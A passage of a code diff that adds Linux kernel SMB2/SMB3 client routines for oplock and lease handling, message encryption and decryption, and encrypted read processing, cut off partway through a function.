++	if (oplock == SMB2_OPLOCK_LEVEL_BATCH) {
++		cinode->oplock = CIFS_CACHE_RHW_FLG;
++		cifs_dbg(FYI, "Batch Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		cinode->oplock = CIFS_CACHE_RW_FLG;
++		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else if (oplock == SMB2_OPLOCK_LEVEL_II) {
++		cinode->oplock = CIFS_CACHE_READ_FLG;
++		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
++			 &cinode->netfs.inode);
++	} else
++		cinode->oplock = 0;
++}
++
++static void
++smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		       unsigned int epoch, bool *purge_cache)
++{
++	char message[5] = {0};
++	unsigned int new_oplock = 0;
++
++	oplock &= 0xFF;
++	cinode->lease_granted = true;
++	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
++		return;
++
++	/* Check if the server granted an oplock rather than a lease */
++	if (oplock & SMB2_OPLOCK_LEVEL_EXCLUSIVE)
++		return smb2_set_oplock_level(cinode, oplock, epoch,
++					     purge_cache);
++
++	if (oplock & SMB2_LEASE_READ_CACHING_HE) {
++		new_oplock |= CIFS_CACHE_READ_FLG;
++		strcat(message, "R");
++	}
++	if (oplock & SMB2_LEASE_HANDLE_CACHING_HE) {
++		new_oplock |= CIFS_CACHE_HANDLE_FLG;
++		strcat(message, "H");
++	}
++	if (oplock & SMB2_LEASE_WRITE_CACHING_HE) {
++		new_oplock |= CIFS_CACHE_WRITE_FLG;
++		strcat(message, "W");
++	}
++	if (!new_oplock)
++		strncpy(message, "None", sizeof(message));
++
++	cinode->oplock = new_oplock;
++	cifs_dbg(FYI, "%s Lease granted on inode %p\n", message,
++		 &cinode->netfs.inode);
++}
++
++static void
++smb3_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	unsigned int old_oplock = cinode->oplock;
++
++	smb21_set_oplock_level(cinode, oplock, epoch, purge_cache);
++
++	if (purge_cache) {
++		*purge_cache = false;
++		if (old_oplock == CIFS_CACHE_READ_FLG) {
++			if (cinode->oplock == CIFS_CACHE_READ_FLG &&
++			    (epoch - cinode->epoch > 0))
++				*purge_cache = true;
++			else if (cinode->oplock == CIFS_CACHE_RH_FLG &&
++				 (epoch - cinode->epoch > 1))
++				*purge_cache = true;
++			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
++				 (epoch - cinode->epoch > 1))
++				*purge_cache = true;
++			else if (cinode->oplock == 0 &&
++				 (epoch - cinode->epoch > 0))
++				*purge_cache = true;
++		} else if (old_oplock == CIFS_CACHE_RH_FLG) {
++			if (cinode->oplock == CIFS_CACHE_RH_FLG &&
++			    (epoch - cinode->epoch > 0))
++				*purge_cache = true;
++			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
++				 (epoch - cinode->epoch > 1))
++				*purge_cache = true;
++		}
++		cinode->epoch = epoch;
++	}
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static bool
++smb2_is_read_op(__u32 oplock)
++{
++	return oplock == SMB2_OPLOCK_LEVEL_II;
++}
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++
++static bool
++smb21_is_read_op(__u32 oplock)
++{
++	return (oplock & SMB2_LEASE_READ_CACHING_HE) &&
++	       !(oplock & SMB2_LEASE_WRITE_CACHING_HE);
++}
++
++static __le32
++map_oplock_to_lease(u8 oplock)
++{
++	if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
++		return SMB2_LEASE_WRITE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE;
++	else if (oplock == SMB2_OPLOCK_LEVEL_II)
++		return SMB2_LEASE_READ_CACHING_LE;
++	else if (oplock == SMB2_OPLOCK_LEVEL_BATCH)
++		return SMB2_LEASE_HANDLE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE |
++		       SMB2_LEASE_WRITE_CACHING_LE;
++	return 0;
++}
++
++static char *
++smb2_create_lease_buf(u8 *lease_key, u8 oplock)
++{
++	struct create_lease *buf;
++
++	buf = kzalloc(sizeof(struct create_lease), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
++	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_lease, lcontext));
++	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
++	buf->Name[0] = 'R';
++	buf->Name[1] = 'q';
++	buf->Name[2] = 'L';
++	buf->Name[3] = 's';
++	return (char *)buf;
++}
++
++static char *
++smb3_create_lease_buf(u8 *lease_key, u8 oplock)
++{
++	struct create_lease_v2 *buf;
++
++	buf = kzalloc(sizeof(struct create_lease_v2), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
++	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_lease_v2, lcontext));
++	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease_v2, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
++	buf->Name[0] = 'R';
++	buf->Name[1] = 'q';
++	buf->Name[2] = 'L';
++	buf->Name[3] = 's';
++	return (char *)buf;
++}
++
++static __u8
++smb2_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
++{
++	struct create_lease *lc = (struct create_lease *)buf;
++
++	*epoch = 0; /* not used */
++	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
++		return SMB2_OPLOCK_LEVEL_NOCHANGE;
++	return le32_to_cpu(lc->lcontext.LeaseState);
++}
++
++static __u8
++smb3_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
++{
++	struct create_lease_v2 *lc = (struct create_lease_v2 *)buf;
++
++	*epoch = le16_to_cpu(lc->lcontext.Epoch);
++	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
++		return SMB2_OPLOCK_LEVEL_NOCHANGE;
++	if (lease_key)
++		memcpy(lease_key, &lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++	return le32_to_cpu(lc->lcontext.LeaseState);
++}
++
++static unsigned int
++smb2_wp_retry_size(struct inode *inode)
++{
++	return min_t(unsigned int, CIFS_SB(inode->i_sb)->ctx->wsize,
++		     SMB2_MAX_BUFFER_SIZE);
++}
++
++static bool
++smb2_dir_needs_close(struct cifsFileInfo *cfile)
++{
++	return !cfile->invalidHandle;
++}
++
++static void
++fill_transform_hdr(struct smb2_transform_hdr *tr_hdr, unsigned int orig_len,
++		   struct smb_rqst *old_rq, __le16 cipher_type)
++{
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)old_rq->rq_iov[0].iov_base;
++
++	memset(tr_hdr, 0, sizeof(struct smb2_transform_hdr));
++	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
++	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
++	tr_hdr->Flags = cpu_to_le16(0x01);
++	if ((cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++	    (cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	else
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	memcpy(&tr_hdr->SessionId, &shdr->SessionId, 8);
++}
++
++static void *smb2_aead_req_alloc(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++				 int num_rqst, const u8 *sig, u8 **iv,
++				 struct aead_request **req, struct scatterlist **sgl,
++				 unsigned int *num_sgs)
++{
++	unsigned int req_size = sizeof(**req) + crypto_aead_reqsize(tfm);
++	unsigned int iv_size = crypto_aead_ivsize(tfm);
++	unsigned int len;
++	u8 *p;
++
++	*num_sgs = cifs_get_num_sgs(rqst, num_rqst, sig);
++
++	len = iv_size;
++	len += crypto_aead_alignmask(tfm) & ~(crypto_tfm_ctx_alignment() - 1);
++	len = ALIGN(len, crypto_tfm_ctx_alignment());
++	len += req_size;
++	len = ALIGN(len, __alignof__(struct scatterlist));
++	len += *num_sgs * sizeof(**sgl);
++
++	p = kmalloc(len, GFP_ATOMIC);
++	if (!p)
++		return NULL;
++
++	*iv = (u8 *)PTR_ALIGN(p, crypto_aead_alignmask(tfm) + 1);
++	*req = (struct aead_request *)PTR_ALIGN(*iv + iv_size,
++						crypto_tfm_ctx_alignment());
++	*sgl = (struct scatterlist *)PTR_ALIGN((u8 *)*req + req_size,
++					       __alignof__(struct scatterlist));
++	return p;
++}
++
++static void *smb2_get_aead_req(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++			       int num_rqst, const u8 *sig, u8 **iv,
++			       struct aead_request **req, struct scatterlist **sgl)
++{
++	unsigned int off, len, skip;
++	struct scatterlist *sg;
++	unsigned int num_sgs;
++	unsigned long addr;
++	int i, j;
++	void *p;
++
++	p = smb2_aead_req_alloc(tfm, rqst, num_rqst, sig, iv, req, sgl, &num_sgs);
++	if (!p)
++		return NULL;
++
++	sg_init_table(*sgl, num_sgs);
++	sg = *sgl;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
++		for (j = 0; j < rqst[i].rq_nvec; j++) {
++			struct kvec *iov = &rqst[i].rq_iov[j];
++
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			len = iov->iov_len - skip;
++			sg = cifs_sg_set_buf(sg, (void *)addr, len);
++		}
++		for (j = 0; j < rqst[i].rq_npages; j++) {
++			rqst_page_get_length(&rqst[i], j, &len, &off);
++			sg_set_page(sg++, rqst[i].rq_pages[j], len, off);
++		}
++	}
++	cifs_sg_set_buf(sg, sig, SMB2_SIGNATURE_SIZE);
++
++	return p;
++}
++
++static int
++smb2_get_enc_key(struct TCP_Server_Info *server, __u64 ses_id, int enc, u8 *key)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	u8 *ses_enc_key;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (ses->Suid == ses_id) {
++			spin_lock(&ses->ses_lock);
++			ses_enc_key = enc ? ses->smb3encryptionkey :
++				ses->smb3decryptionkey;
++			memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
++			spin_unlock(&ses->ses_lock);
++			spin_unlock(&cifs_tcp_ses_lock);
++			return 0;
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	return -EAGAIN;
++}
++/*
++ * Encrypt or decrypt @rqst message. @rqst[0] has the following format:
++ * iov[0]   - transform header (associate data),
++ * iov[1-N] - SMB2 header and pages - data to encrypt.
++ * On success return encrypted data in iov[1-N] and pages, leave iov[0]
++ * untouched.
++ */
++static int
++crypt_message(struct TCP_Server_Info *server, int num_rqst,
++	      struct smb_rqst *rqst, int enc)
++{
++	struct smb2_transform_hdr *tr_hdr =
++		(struct smb2_transform_hdr *)rqst[0].rq_iov[0].iov_base;
++	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
++	int rc = 0;
++	struct scatterlist *sg;
++	u8 sign[SMB2_SIGNATURE_SIZE] = {};
++	u8 key[SMB3_ENC_DEC_KEY_SIZE];
++	struct aead_request *req;
++	u8 *iv;
++	DECLARE_CRYPTO_WAIT(wait);
++	struct crypto_aead *tfm;
++	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++	void *creq;
++
++	rc = smb2_get_enc_key(server, le64_to_cpu(tr_hdr->SessionId), enc, key);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not get %scryption key\n", __func__,
++			 enc ? "en" : "de");
++		return rc;
++	}
++
++	rc = smb3_crypto_aead_allocate(server);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
++		return rc;
++	}
++
++	tfm = enc ? server->secmech.enc : server->secmech.dec;
++
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
++		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
++	else
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
++
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Failed to set aead key %d\n", __func__, rc);
++		return rc;
++	}
++
++	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Failed to set authsize %d\n", __func__, rc);
++		return rc;
++	}
++
++	creq = smb2_get_aead_req(tfm, rqst, num_rqst, sign, &iv, &req, &sg);
++	if (unlikely(!creq))
++		return -ENOMEM;
++
++	if (!enc) {
++		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
++		crypt_len += SMB2_SIGNATURE_SIZE;
++	}
++
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++	    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	else {
++		iv[0] = 3;
++		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	}
++
++	aead_request_set_tfm(req, tfm);
++	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
++	aead_request_set_ad(req, assoc_data_len);
++
++	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_BACKLOG,
++				  crypto_req_done, &wait);
++
++	rc = crypto_wait_req(enc ? crypto_aead_encrypt(req)
++				: crypto_aead_decrypt(req), &wait);
++
++	if (!rc && enc)
++		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
++
++	kfree_sensitive(creq);
++	return rc;
++}
++
++void
++smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst)
++{
++	int i, j;
++
++	for (i = 0; i < num_rqst; i++) {
++		if (rqst[i].rq_pages) {
++			for (j = rqst[i].rq_npages - 1; j >= 0; j--)
++				put_page(rqst[i].rq_pages[j]);
++			kfree(rqst[i].rq_pages);
++		}
++	}
++}
++
++/*
++ * This function will initialize new_rq and encrypt the content.
++ * The first entry, new_rq[0], only contains a single iov which contains
++ * a smb2_transform_hdr and is pre-allocated by the caller.
++ * This function then populates new_rq[1+] with the content from olq_rq[0+].
++ *
++ * The end result is an array of smb_rqst structures where the first structure
++ * only contains a single iov for the transform header which we then can pass
++ * to crypt_message().
++ *
++ * new_rq[0].rq_iov[0] :  smb2_transform_hdr pre-allocated by the caller
++ * new_rq[1+].rq_iov[*] == old_rq[0+].rq_iov[*] : SMB2/3 requests
++ */
++static int
++smb3_init_transform_rq(struct TCP_Server_Info *server, int num_rqst,
++		       struct smb_rqst *new_rq, struct smb_rqst *old_rq)
++{
++	struct page **pages;
++	struct smb2_transform_hdr *tr_hdr = new_rq[0].rq_iov[0].iov_base;
++	unsigned int npages;
++	unsigned int orig_len = 0;
++	int i, j;
++	int rc = -ENOMEM;
++
++	for (i = 1; i < num_rqst; i++) {
++		npages = old_rq[i - 1].rq_npages;
++		pages = kmalloc_array(npages, sizeof(struct page *),
++				      GFP_KERNEL);
++		if (!pages)
++			goto err_free;
++
++		new_rq[i].rq_pages = pages;
++		new_rq[i].rq_npages = npages;
++		new_rq[i].rq_offset = old_rq[i - 1].rq_offset;
++		new_rq[i].rq_pagesz = old_rq[i - 1].rq_pagesz;
++		new_rq[i].rq_tailsz = old_rq[i - 1].rq_tailsz;
++		new_rq[i].rq_iov = old_rq[i - 1].rq_iov;
++		new_rq[i].rq_nvec = old_rq[i - 1].rq_nvec;
++
++		orig_len += smb_rqst_len(server, &old_rq[i - 1]);
++
++		for (j = 0; j < npages; j++) {
++			pages[j] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++			if (!pages[j])
++				goto err_free;
++		}
++
++		/* copy pages form the old */
++		for (j = 0; j < npages; j++) {
++			char *dst, *src;
++			unsigned int offset, len;
++
++			rqst_page_get_length(&new_rq[i], j, &len, &offset);
++
++			dst = (char *) kmap(new_rq[i].rq_pages[j]) + offset;
++			src = (char *) kmap(old_rq[i - 1].rq_pages[j]) + offset;
++
++			memcpy(dst, src, len);
++			kunmap(new_rq[i].rq_pages[j]);
++			kunmap(old_rq[i - 1].rq_pages[j]);
++		}
++	}
++
++	/* fill the 1st iov with a transform header */
++	fill_transform_hdr(tr_hdr, orig_len, old_rq, server->cipher_type);
++
++	rc = crypt_message(server, num_rqst, new_rq, 1);
++	cifs_dbg(FYI, "Encrypt message returned %d\n", rc);
++	if (rc)
++		goto err_free;
++
++	return rc;
++
++err_free:
++	smb3_free_compound_rqst(num_rqst - 1, &new_rq[1]);
++	return rc;
++}
++
++static int
++smb3_is_transform_hdr(void *buf)
++{
++	struct smb2_transform_hdr *trhdr = buf;
++
++	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
++}
++
++static int
++decrypt_raw_data(struct TCP_Server_Info *server, char *buf,
++		 unsigned int buf_data_size, struct page **pages,
++		 unsigned int npages, unsigned int page_data_size,
++		 bool is_offloaded)
++{
++	struct kvec iov[2];
++	struct smb_rqst rqst = {NULL};
++	int rc;
++
++	iov[0].iov_base = buf;
++	iov[0].iov_len = sizeof(struct smb2_transform_hdr);
++	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr);
++	iov[1].iov_len = buf_data_size;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++	rqst.rq_pages = pages;
++	rqst.rq_npages = npages;
++	rqst.rq_pagesz = PAGE_SIZE;
++	rqst.rq_tailsz = (page_data_size % PAGE_SIZE) ? : PAGE_SIZE;
++
++	rc = crypt_message(server, 1, &rqst, 0);
++	cifs_dbg(FYI, "Decrypt message returned %d\n", rc);
++
++	if (rc)
++		return rc;
++
++	memmove(buf, iov[1].iov_base, buf_data_size);
++
++	if (!is_offloaded)
++		server->total_read = buf_data_size + page_data_size;
++
++	return rc;
++}
++
++static int
++read_data_into_pages(struct TCP_Server_Info *server, struct page **pages,
++		     unsigned int npages, unsigned int len)
++{
++	int i;
++	int length;
++
++	for (i = 0; i < npages; i++) {
++		struct page *page = pages[i];
++		size_t n;
++
++		n = len;
++		if (len >= PAGE_SIZE) {
++			/* enough data to fill the page */
++			n = PAGE_SIZE;
++			len -= n;
++		} else {
++			zero_user(page, len, PAGE_SIZE - len);
++			len = 0;
++		}
++		length = cifs_read_page_from_socket(server, page, 0, n);
++		if (length < 0)
++			return length;
++		server->total_read += length;
++	}
++
++	return 0;
++}
++
++static int
++init_read_bvec(struct page **pages, unsigned int npages, unsigned int data_size,
++	       unsigned int cur_off, struct bio_vec **page_vec)
++{
++	struct bio_vec *bvec;
++	int i;
++
++	bvec = kcalloc(npages, sizeof(struct bio_vec), GFP_KERNEL);
++	if (!bvec)
++		return -ENOMEM;
++
++	for (i = 0; i < npages; i++) {
++		bvec[i].bv_page = pages[i];
++		bvec[i].bv_offset = (i == 0) ? cur_off : 0;
++		bvec[i].bv_len = min_t(unsigned int, PAGE_SIZE, data_size);
++		data_size -= bvec[i].bv_len;
++	}
++
++	if (data_size != 0) {
++		cifs_dbg(VFS, "%s: something went wrong\n", __func__);
++		kfree(bvec);
++		return -EIO;
++	}
++
++	*page_vec = bvec;
++	return 0;
++}
++
++static int
++handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
++		 char *buf, unsigned int buf_len, struct page **pages,
++		 unsigned int npages, unsigned int page_data_size,
++		 bool is_offloaded)
++{
++	unsigned int data_offset;
++	unsigned int data_len;
++	unsigned int cur_off;
++	unsigned int cur_page_idx;
++	unsigned int pad_len;
++	struct cifs_readdata *rdata = mid->callback_data;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	struct bio_vec *bvec = NULL;
++	struct iov_iter iter;
++	struct kvec iov;
++	int length;
++	bool use_rdma_mr = false;
++
++	if (shdr->Command != SMB2_READ) {
++		cifs_server_dbg(VFS, "only big read responses are supported\n");
++		return -ENOTSUPP;
++	}
++
++	if (server->ops->is_session_expired &&
++	    server->ops->is_session_expired(buf)) {
++		if (!is_offloaded)
++			cifs_reconnect(server, true);
++		return -1;
++	}
++
++	if (server->ops->is_status_pending &&
++			server->ops->is_status_pending(buf, server))
++		return -1;
++
++	/* set up first two iov to get credits */
++	rdata->iov[0].iov_base = buf;
++	rdata->iov[0].iov_len = 0;
++	rdata->iov[1].iov_base = buf;
++	rdata->iov[1].iov_len =
++		min_t(unsigned int, buf_len, server->vals->read_rsp_size);
++	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
++	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
++
++	rdata->result = server->ops->map_error(buf, true);
++	if (rdata->result != 0) {
++		cifs_dbg(FYI, "%s: server returned error %d\n",
++			 __func__, rdata->result);
++		/* normal error on read response */
++		if (is_offloaded)
++			mid->mid_state = MID_RESPONSE_RECEIVED;
++		else
++			dequeue_mid(mid, false);
++		return 0;
++	}
++
++	data_offset = server->ops->read_data_offset(buf);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	use_rdma_mr = rdata->mr;
++#endif
++	data_len = server->ops->read_data_length(buf, use_rdma_mr);
++
++	if (data_offset < server->vals->read_rsp_size) {
++		/*
++		 * win2k8 sometimes sends an offset of 0 when the read
++		 * is beyond the EOF. Treat it as if the data starts just after
++		 * the header.
++		 */
++		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
++			 __func__, data_offset);
++		data_offset = server->vals->read_rsp_size;
++	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
++		/* data_offset is beyond the end of smallbuf */
++		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
++			 __func__, data_offset);
++		rdata->result = -EIO;
++		if (is_offloaded)
++			mid->mid_state = MID_RESPONSE_MALFORMED;
++		else
++			dequeue_mid(mid, rdata->result);
++		return 0;
++	}
++
++	pad_len = data_offset - server->vals->read_rsp_size;
++
++	if (buf_len <= data_offset) {
++		/* read response payload is in pages */
++		cur_page_idx = pad_len / PAGE_SIZE;
++		cur_off = pad_len % PAGE_SIZE;
++
++		if (cur_page_idx != 0) {
++			/* data offset is beyond the 1st page of response */
++			cifs_dbg(FYI, "%s: data offset (%u) beyond 1st page of response\n",
++				 __func__, data_offset);
++			rdata->result = -EIO;
++			if (is_offloaded)
++				mid->mid_state = MID_RESPONSE_MALFORMED;
++			else
++				dequeue_mid(mid, rdata->result);
++			return 0;
++		}
++
++		if (data_len > page_data_size - pad_len) {
++			/* data_len is corrupt -- discard frame */
++			rdata->result = -EIO;
++			if (is_offloaded)
++				mid->mid_state = MID_RESPONSE_MALFORMED;
++			else
++				dequeue_mid(mid, rdata->result);
++			return 0;
++		}
++
++		rdata->result = init_read_bvec(pages, npages, page_data_size,
++					       cur_off, &bvec);
++		if (rdata->result != 0) {
++			if (is_offloaded)
++				mid->mid_state = MID_RESPONSE_MALFORMED;
++			else
++				dequeue_mid(mid, rdata->result);
++			return 0;
++		}
++
++		iov_iter_bvec(&iter, ITER_SOURCE, bvec, npages, data_len);
++	} else if (buf_len >= data_offset + data_len) {
++		/* read response payload is in buf */
++		WARN_ONCE(npages > 0, "read data can be either in buf or in pages");
++		iov.iov_base = buf + data_offset;
++		iov.iov_len = data_len;
++		iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, data_len);
++	} else {
++		/* read response payload cannot be in both buf and pages */
++		WARN_ONCE(1, "buf can not contain only a part of read data");
++		rdata->result = -EIO;
++		if (is_offloaded)
++			mid->mid_state = MID_RESPONSE_MALFORMED;
++		else
++			dequeue_mid(mid, rdata->result);
++		return 0;
++	}
++
++	length = rdata->copy_into_pages(server, rdata, &iter);
++
++	kfree(bvec);
++
++	if (length < 0)
++		return length;
++
++	if (is_offloaded)
++		mid->mid_state = MID_RESPONSE_RECEIVED;
++	else
++		dequeue_mid(mid, false);
++	return length;
++}
++
++struct smb2_decrypt_work {
++	struct work_struct decrypt;
++	struct TCP_Server_Info *server;
++	struct page **ppages;
++	char *buf;
++	unsigned int npages;
++	unsigned int len;
++};
++
++
++static void smb2_decrypt_offload(struct work_struct *work)
++{
++	struct smb2_decrypt_work *dw = container_of(work,
++				struct smb2_decrypt_work, decrypt);
++	int i, rc;
++	struct mid_q_entry *mid;
++
++	rc = decrypt_raw_data(dw->server, dw->buf, dw->server->vals->read_rsp_size,
++			      dw->ppages, dw->npages, dw->len, true);
++	if (rc) {
++		cifs_dbg(VFS, "error decrypting rc=%d\n", rc);
++		goto free_pages;
++	}
++
++	dw->server->lstrp = jiffies;
++	mid = smb2_find_dequeue_mid(dw->server, dw->buf);
++	if (mid == NULL)
++		cifs_dbg(FYI, "mid not found\n");
++	else {
++		mid->decrypted = true;
++		rc = handle_read_data(dw->server, mid, dw->buf,
++				      dw->server->vals->read_rsp_size,
++				      dw->ppages, dw->npages, dw->len,
++				      true);
++		if (rc >= 0) {
++#ifdef CONFIG_CIFS_STATS2
++			mid->when_received = jiffies;
++#endif
++			if (dw->server->ops->is_network_name_deleted)
++				dw->server->ops->is_network_name_deleted(dw->buf,
++									 dw->server);
++
++			mid->callback(mid);
++		} else {
++			spin_lock(&dw->server->srv_lock);
++			if (dw->server->tcpStatus == CifsNeedReconnect) {
++				spin_lock(&dw->server->mid_lock);
++				mid->mid_state = MID_RETRY_NEEDED;
++				spin_unlock(&dw->server->mid_lock);
++				spin_unlock(&dw->server->srv_lock);
++				mid->callback(mid);
++			} else {
++				spin_lock(&dw->server->mid_lock);
++				mid->mid_state = MID_REQUEST_SUBMITTED;
++				mid->mid_flags &= ~(MID_DELETED);
++				list_add_tail(&mid->qhead,
++					&dw->server->pending_mid_q);
++				spin_unlock(&dw->server->mid_lock);
++				spin_unlock(&dw->server->srv_lock);
++			}
++		}
++		release_mid(mid);
++	}
++
++free_pages:
++	for (i = dw->npages-1; i >= 0; i--)
++		put_page(dw->ppages[i]);
++
++	kfree(dw->ppages);
++	cifs_small_buf_release(dw->buf);
++	kfree(dw);
++}
++
++
++static int
++receive_encrypted_read(struct TCP_Server_Info *server, struct mid_q_entry **mid,
++		       int *num_mids)
++{
++	char *buf = server->smallbuf;
++	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
++	unsigned int npages;
++	struct page **pages;
++	unsigned int len;
++	unsigned int buflen = server->pdu_size;
++	int rc;
++	int i = 0;
++	struct smb2_decrypt_work *dw;
++
++	*num_mids = 1;
++	len = min_t(unsigned int, buflen, server->vals->read_rsp_size +
++		sizeof(struct smb2_transform_hdr)) - HEADER_SIZE(server) + 1;
++
++	rc = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1, len);
++	if (rc < 0)
++		return rc;
++	server->total_read += rc;
++
++	len = le32_to_cpu(tr_hdr->OriginalMessageSize) -
++		server->vals->read_rsp_size;
++	npages = DIV_ROUND_UP(len, PAGE_SIZE);
++
++	pages = kmalloc_array(npages, sizeof(struct page *), GFP_KERNEL);
++	if (!pages) {
++		rc = -ENOMEM;
++		goto discard_data;
++	}
++
++	for (; i < npages; i++) {
++		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++		if (!pages[i]) {
++			rc = -ENOMEM;
++			goto discard_data;
++		}
++	}
++
++	/* read read data into pages */
++	rc = read_data_into_pages(server, pages, npages, len);
++	if (rc)
++		goto free_pages;
++
++	rc = cifs_discard_remaining_data(server);
++	if (rc)
++		goto free_pages;
++
++	/*
++	 * For large reads, offload to different thread for better performance,
++	 * use more cores decrypting which can be expensive
++	 */
++
++	if ((server->min_offload) && (server->in_flight > 1) &&
++	    (server->pdu_size >= server->min_offload)) {
++		dw = kmalloc(sizeof(struct smb2_decrypt_work), GFP_KERNEL);
++		if (dw == NULL)
++			goto non_offloaded_decrypt;
++
++		dw->buf = server->smallbuf;
++		server->smallbuf = (char *)cifs_small_buf_get();
++
++		INIT_WORK(&dw->decrypt, smb2_decrypt_offload);
++
++		dw->npages = npages;
++		dw->server = server;
++		dw->ppages = pages;
++		dw->len = len;
++		queue_work(decrypt_wq, &dw->decrypt);
++		*num_mids = 0; /* worker thread takes care of finding mid */
++		return -1;
++	}
++
++non_offloaded_decrypt:
++	rc = decrypt_raw_data(server, buf, server->vals->read_rsp_size,
